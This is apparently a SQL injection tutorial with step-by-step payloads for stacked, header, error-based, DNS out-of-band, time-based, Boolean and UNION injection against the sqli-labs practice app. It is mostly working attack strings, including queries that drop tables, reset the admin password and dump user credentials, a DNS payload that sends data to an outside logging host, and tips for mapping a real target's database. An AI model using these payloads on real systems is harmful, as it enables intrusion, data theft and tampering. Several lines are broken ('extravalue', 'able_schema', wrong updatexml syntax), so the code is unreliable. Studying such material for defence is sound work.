In SQL, a semicolon represents the end of one SQL statement, while stack-based injection involves executing multiple SQL statements together. Stack-based injection is different from other injection techniques and has limitations.
1 2
%27 --- ' %20 --- space
How can you find the table fields and table names of the other party?
Look for exploitable files using directory traversal vulnerabilities, such as files with a .sql extension.
Use directory/file fuzzing tools like Dirsearch, etc., to search for .sql files.
Search for source code leakage vulnerabilities on the other party’s website; the source code may contain exploitable files.
Search for the other party’s website source code on GitHub.
Example:
1 2 3 4 5
http://192.168.1.33/sqli-labs-master/Less-38/?id=1' //You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1 http://192.168.1.33/sqli-labs-master/Less-38/?id=1'; // it's ok http://192.168.1.33/sqli-labs-master/Less-38/?id=1';create table aa like users; //create a table named aa, structure like table users http://192.168.1.33/sqli-labs-master/Less-38/?id=1';drop table aa--+ http://192.168.1.33/sqli-labs-master/Less-38/?id=1';update users set password ='admin@1234' where username='admin'
HTTP header injection is a security vulnerability that occurs when an attacker is able to inject malicious content into HTTP headers. This can have various security implications, including the potential for cross-site scripting (XSS) attacks or other forms of web application exploitation.
Example :
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
POST /sqli-labs-master/Less-18/ HTTP/1.1 Host: 192.168.1.33 Content-Length: 38 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.1.33 Content-Type: application/x-www-form-urlencoded User-Agent:1' and updatexml(1,concat(0x7e,(user()),0x7e),1) and '1'='1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.1.33/sqli-labs-master/Less-18/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Connection: close
Error-Based Injection involves deliberately triggering error conditions in the database to make query results appear in error messages. This technique is particularly useful in cases where UNION-based injections are restricted and error information can be returned. It’s also known as Formulaic SQL Injection.
Utilizing the updatexml() function:
Payload:
1
?id=1' and (updatexml(1,concat(0x7e,(select user()),0x7e),1));--+
0x7e: ~ updatexml(): Function used to update XML documents. updatexml() syntax: update(target_xml_document, xpath_expression, new_value) XPath expressions are used to specify paths within an XML document. If the format is incorrect, an error will occur.
Subsequent steps for updatexml-based error-based injection:
(1). Modify the SQL statement for selecting the user position. (2). Retrieve tables in the current database. (3). Retrieve columns of a specific table. (4). Continue step by step.
Utilizing the extravalue() function:
Payload:
1
?id=1' and (extravalue(1,concat(0x7e,(select user()),0x7e)))--+
extravalue() function is similar to updatexml() and is used for querying node content in an XML document. Subsequent steps for extravalue-based error-based injection are the same as for updatexml.
Utilizing the floor() function:
Payload:
1
?id=1' and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
The principle utilized is the repetition of primary keys due to the repetitiveness of floor(rand(0)*2), leading to an error in the group by statement. The group by key principle involves looping through every row of data and saving the results in a temporary table. When reading each row’s key, if the key exists in the temporary table, it won’t update the temporary table’s data. If the key doesn’t exist, it will insert the key’s row data into the temporary table.
Additional Information:
These three functions are commonly used in error-based injections.
Sometimes, when injecting, you may not get direct feedback, or you may not be able to use time-based blind injection. In such cases, you can use out-of-band channels, which means using other protocols or channels, such as HTTP requests, DNS resolution, SMB services, to exfiltrate data. DNS log blind injection can reduce the number of requests sent and achieve injection with direct feedback.
DNS log: It stores domain name information on the DNS server, recording user access information for domains like www.xxx.com.
Conditions for utilization:
secure_file_priv in mysql.ini must be empty.
If secure_file_priv is null, importing and exporting are not allowed.
If secure_file_priv is set to /tmp, importing and exporting can only be done in the /tmp directory.
When secure_file_priv is empty, there are no restrictions, and importing and exporting are allowed.
Example:
1
?id=1' and load_file(concat('\\', (select database()), '.27epx0.ceye.io\abc'))--+"
First, check if an injection vulnerability exists.
Next, determine the injection type: character-based, numeric-based, or search-based.
Determine the available injection method; in this case, union injection and Boolean-based blind injection are not available:
1 2 3
?id=1' and 1=1 %23 (Page response is normal) ?id=1' and 1=2 %23 (Page response is normal) ?id=1' and sleep(5) %23
Page experiences a 5-second delay, indicating the sleep function is injected into the database, confirming the presence of time-based blind injection.
Start by obtaining the length of the database name:
1 2
?id=1' and if((length(database())>7),sleep(5),1) %23 (5-second delay) ?id=1' and if((length(database())>8),sleep(5),1) %23 (No 5-second delay)
This indicates that the database name has a length of 8 characters.
Proceed to retrieve the database name character by character:
1
?id=1' and if((ascii(substr(database(),1,1))>n),sleep(5),1) %23
These steps describe a method for performing time-based blind SQL injection to extract information about the database, such as the length of the database name and the characters that make up the name.
Example of Time-Based Blind SQL Injection Operation:
1 2 3 4 5 6 7 8 9 10 11 12
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' 没有任何反应 http://127.0.0.1/sqli-labs-master/Less-9/?id=1" 没有任何反应 http://127.0.0.1/sqli-labs-master/Less-9/?id=1\ 没有任何反应 http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and 1=1 --+ 没有任何反应 http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and sleep(5) %23 5秒钟后响应,说明是字符型盲注 http://127.0.0.1/sqli-labs-master/Less-9/?id=1 and sleep(5) %23 响应的比较快,说明不是数字型盲注 http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((length(database())>7),sleep(5),1) %23 延时5秒 http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((length(database())>8),sleep(5),1) %23 不延时5秒 http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((ascii(substr(database(),1,1))>114),sleep(5),1) %23 延时5秒 http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((ascii(substr(database(),1,1))>115),sleep(5),1) %23 不延时5秒,得出结论,第一个字符是s,以此类推 http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select count(*) from information_schema.tables where table_schema=database())>3,sleep(5),1) --+ 延时5秒 http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select count(*) from information_schema.tables where table_schema=database())>4,sleep(5),1) --+ 不延时5秒
Next, retrieve the database name character by character:
1
?id=1' and (ascii(substr(database(),1,1))>n) --+
Note: To determine the character at a specific position, you can use a binary search method. To obtain the second character of the database name, simply change the position in the “substr” function.
Use Burp Suite’s Intruder module to iterate through the possibilities.
Obtain the number of tables:
1
?id=1' and (select count(*) from information_schema.tables where table_schema='security') > 3
Retrieve the length of the tables. These steps outline a method for conducting a blind Boolean-based SQL injection to gather information about a database, such as the database name and the number of tables.
Example of Boolean Blind SQL Injection Operation
1 2 3 4 5 6 7 8 9 10 11 12 13 14
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 1=1 --+ correct http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 1=2 --+ error http://127.0.0.1/sqli-labs-master/Less-8/?id=1' order by 3 --+ correct http://127.0.0.1/sqli-labs-master/Less-8/?id=1' order by 4 --+ error http://127.0.0.1/sqli-labs-master/Less-8/?id=1' union select 1,2,3 --+ http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (length(database()))>7 --+ correct database name's length <=8 http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (length(database()))>8 --+ error http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (ascii(substr(database(),1,1))>114) --+ http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (ascii(substr(database(),1,1))>115) --+ http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select count(*) from information_schema.tables where table_schema='security') > 3 --+ http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select count(*) from information_schema.tables where table_schema='security') > 4 --+ http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (ord(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)) > 100) --+ http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (ord(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)) > 101) --+
First, check for the existence of an SQL injection vulnerability.
Then, determine the injection type: character-based, numeric-based, or search-based.
Use “order by” to further identify the number of columns:
1 2
?id=1' order by 3 --+ (normal) ?id=1' order by 4 --+ (error)
Once the number of columns is determined using “order by,” proceed to replace the display position with some MySQL functions.
Retrieve the tables in the current database:
1
?id=-1' union select 1, group_concat('<br>', table_name), version() from information_schema.tables where table_schema=database()--+
After obtaining the tables, retrieve the columns in those tables:
1
?id=-1' union select 1, group_concat('<br>', column_name), version() from information_schema.columns where able_schema=database() and table_name='users'--+
Retrieve the data:
1
?id=-1' union select 1, group_concat('|', username), group_concat('|', password) from users--+
These steps describe how an attacker can detect and exploit a SQL injection vulnerability to extract information from a database.
Example of Union Sql Injection Operation
1 2 3 4 5 6 7 8 9
http://127.0.0.1/sqli-labs-master/Less-1/?id=1' http://127.0.0.1/sqli-labs-master/Less-1/?id=1' order by 3 --+ correct http://127.0.0.1/sqli-labs-master/Less-1/?id=1' order by 4 --+ error http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,3 --+ http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,database(),version() --+ http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat('<br>',table_name) ,version() from information_schema.tables where table_schema=database()--+ http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat('<br>',column_name),version() from information_schema.columns where table_schema=database() and table_name='users' --+ http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1, username,password from users --+ http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1, group_concat('|',username),group_concat('|',password) from users --+